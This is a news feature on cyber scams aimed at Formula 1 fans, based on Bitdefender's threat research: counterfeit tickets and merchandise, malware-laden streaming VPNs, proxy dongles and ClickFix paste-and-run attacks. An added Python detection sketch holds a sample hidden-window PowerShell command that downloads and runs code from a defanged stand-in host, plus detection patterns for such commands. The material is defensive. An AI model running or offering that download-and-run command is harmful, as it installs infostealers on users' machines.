‘When things are moving fast, people make mistakes — and those mistakes cost’: Formula 1 fans are doing everything they can to watch motorsport, but it might cost them more than they’d expect

A photo of a screen displaying the Bitdefender Cybersecurity Grand Prix at Pista Di Fiorano in Italy
(Image credit: Future / Benedict Collins)

Formula 1 is one of the most popular sports in the world today, boasting over 827 million highly passionate fans across the world in 2025, all tuning in to watch wins, losses, crashes, and (occasionally) disqualifications.

To say Formula 1 fans get emotional is an understatement, and when there is a chance to win, many will go to extreme lengths to watch it happen, and not always legitimately. For a threat actor, that pool of 827 million fans is an unmissable opportunity.

But participation goes beyond just watching the sport. The allure of cheap or discounted merchandise, dubious free streaming services, and the too-good-to-be-true offers play on the high-stakes nature of the sport, and the emotions of passionate fans – we spoke to security giants (and Ferrari partners) Bitdefender to find out more.

A photo of the F104 Starfighter behind the Ferrari logo located at Ferrari's Pista Di Fiorano race track.

Things move very, very fast in Formula 1. (Image credit: Future / Benedict Collins)

Bitdefender Threat Index

At Pista di Fiorano, Ferrari’s private racetrack in Italy, I was part of a group of journalists given exclusive access to Bitdefender’s Fan Threat Index, which has collated data on the threats facing fans since March 2025.

Bogdan Botezatu, Senior Director of Threat Research & Reporting at Bitdefender, was on hand to guide us through the report.

“Scams are evolving. Last year, cybercrime was making about $9 trillion in losses at the global scale. Out of that $9 trillion slice, about $1 trillion is responsible for scamming,” he said. “This Fan Threat Index is our response to how scams are evolving.”

The Formula 1 teams themselves face a huge array of threats. There is the potential for not only malware and ransomware, but also physical infiltration to steal intellectual property and secrets – and that is why teams form partnerships exactly like Ferrari’s partnership with Bitdefender, which can offer the teams the expertise and solutions they need to stay protected.


“At home though, things are fundamentally different,” Botezatu notes. “When things are moving fast, people make mistakes, and those mistakes cost.”

He explains there are four major threats that Formula 1 fans face. “The motorsport ecosystem is dominated by speed; you have to source tickets fast; you have to get the right merchandise from the right vendor; you have to find a streaming partner to watch the show at home; you have to face that emotional involvement that happens on race weekend.”

A photo of Bruce Sussman and Bogdan Botezatu presenting the Bitdefender Fan Threat Index report.

(Image credit: Future / Benedict Collins)

Last minute tickets and counterfeit merchandise

The ultimate thrill for a Formula 1 fan is almost certainly the opportunity to watch a race in person. In order to make cheap or discounted tickets even more alluring, scammers will seek to lower the cost of entry by offering ticket lotteries and giveaways.

Attending in the merchandise of a fan’s chosen team adds to the allure, and these forms of scam usually spike in the run up to a race as eager fans look for last minute tickets, and finalize their race-day outfits.

The main target for scammers is the theft of financial information. Drawn in by the urgency of an “80% OFF” banner and a storefront that looks legitimate, many fans will trade their banking details for a knock-off hat.

These websites are hosted on short-lived domains that are quickly recycled once the event is over, and are most commonly disseminated through social media.

“These cybercrime groups are using stolen accounts that have credit cards attached to boost promoted posts,” Botezatu explains. “That’s how they reach the right audiences, and that’s how they advertise their offers in front of the right people.”

“They are maximizing their profits using social media tactics,” he adds, explaining that they can abuse the data social media conglomerates such as Meta collect on users to serve their adverts and promoted posts to people of a specific demographic, in a specific geographic area, or those above a specific income.

Free streaming serving up malware

As the build-up to a race reaches its highest intensity, threat actors will begin offering free streaming services to fans desperate to tune in. These websites won’t necessarily only show Formula 1, but will serve a range of content from around the world to funnel in as many users as possible.

In many cases, the dubious streaming service will require that you install a VPN in order to watch. While this is sometimes a legitimate way to watch content that typically would not be available in a user’s region, the services these streaming providers offer are sometimes far from legitimate.

In a best-case scenario, Botezatu explains, you’ll end up purchasing a legitimate streaming service that you don’t actually need and you still won’t be able to watch the race, but it will provide the service owner with a source of affiliate revenue. “Worst case, that VPN kit will be malware, and you’re going to infect your computer or device.”

For those on Android devices, some services will require the installation of a third-party video player in order to access a stream, and again, you will install malware. In these circumstances, Botezatu notes, the malware will often monitor your clipboard or your screen to track everything you type into your device, including sensitive banking and financial information.

The alternative some fans turn to is the dodgy-streaming dongle. Where legitimate streaming dongles such as the Amazon Fire Stick start from around $30, some groups will disseminate streaming dongles with preinstalled software for far less, and sometimes at a loss.

While a fan may feel like they’ve just got a great deal and free access to every upcoming race, the reality is far more sinister. “The people who are selling these are using Formula 1 as a pretext for you to open a proxy; an exit node in a VPN used for cybercrime,” Botezatu says.

“These people give you hardware for free, but instead can sell access to your household to various cybercrime groups that are doing money laundering, illegal content distribution, child pornography, all sorts of things,” he adds.

These devices use your IP address to distribute their illegal content, meaning that when law enforcement investigates these crimes, it could be your house they’re raiding.

Hollywood and modern TV have taught many people that hacking is a highly complex, intelligent pursuit that requires the layman to say, “In English, damn it!”

But the malware distribution scams Bitdefender has spotted targeting some Formula 1 fans are so simple that they border on genius.

Those in the know may have heard of ClickFix attacks, whereby an attacker presents the user with a problem that needs to be solved in order to access a website or service. When many of us are presented with a CAPTCHA to solve, we recognize the familiarity of the branding and will trust that it’s legitimate.

But ClickFix attacks abuse this trust, and rather than clicking on all the bicycles in an image, the user will instead be prompted to open the Windows Terminal using a keyboard shortcut, and then use the “Ctrl” + “V” shortcut to paste in a line of code that the hacker has snuck into the clipboard.

For many antivirus suites, even first-rate protection, this activity appears to be legitimate human activity. The antivirus will do nothing to stop it, and the code will launch a PowerShell application that immediately installs infostealing software onto the infected device. The infostealer will then harvest browser passwords, session cookies, saved credit cards, VPN credentials, and email access – leading to even bigger problems for fans.
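For defenders, the paste-and-run pattern described above still leaves a process-creation record behind. The following triage sketch is an added example, not code from Bitdefender or from this article; it assumes events shaped like Sysmon Event ID 1 records (`ParentImage`, `Image`, `CommandLine`), and the indicator patterns, the two-indicator threshold and the sample events are all constructed for illustration.

```python
import re

# Assumed heuristics for illustration only, not a vendor's detection logic.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}  # where a user pastes
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INDICATORS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring).*(iex|invoke-expression)",
        re.I),
    # Pasted ClickFix commands often carry fake "verification" text as a comment.
    "captcha_lure_text": re.compile(r"(not a robot|captcha|verif(y|ication))", re.I),
}

def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def triage(event):
    """Return matched indicator names when an event looks like a pasted ClickFix command."""
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []  # not started from a user-facing shell or terminal
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    # Require two indicators so a single admin one-liner does not alert.
    return hits if len(hits) >= 2 else []

# Constructed sample events; the URL is defanged and points at a reserved name.
SAMPLES = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "irm hxxp://example.invalid/a | iex" '
                    r"# I am not a robot - reCAPTCHA ID 0000"},
    {"ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "irm hxxp://example.invalid/a | iex"'},
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(basename(ev["Image"]), "<-", basename(ev["ParentImage"]), triage(ev))
```

Only the first sample is flagged; the third carries the same command but is ignored because its parent is not a user-facing process, which is the part of the pattern that distinguishes a pasted command from background automation.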

Our advice to Formula 1 fans? Always be on your guard when hunting for online streams, tickets and merch sales, and other linked activity – and remember, if an offer feels like it could be too good to be true, then it probably is.

Benedict is a Senior Security Writer at TechRadar Pro, where he has specialized in covering the intersection of geopolitics, cyber-warfare, and business security.

Benedict provides detailed analysis on state-sponsored threat actors, APT groups, and the protection of critical national infrastructure, with his reporting bridging the gap between technical threat intelligence and B2B security strategy.

Benedict holds an MA (Distinction) in Security, Intelligence, and Diplomacy from the University of Buckingham Centre for Security and Intelligence Studies (BUCSIS), with his specialization providing him with a robust academic framework for deconstructing complex international conflicts and intelligence operations, and the ability to translate intricate security data into actionable insights.
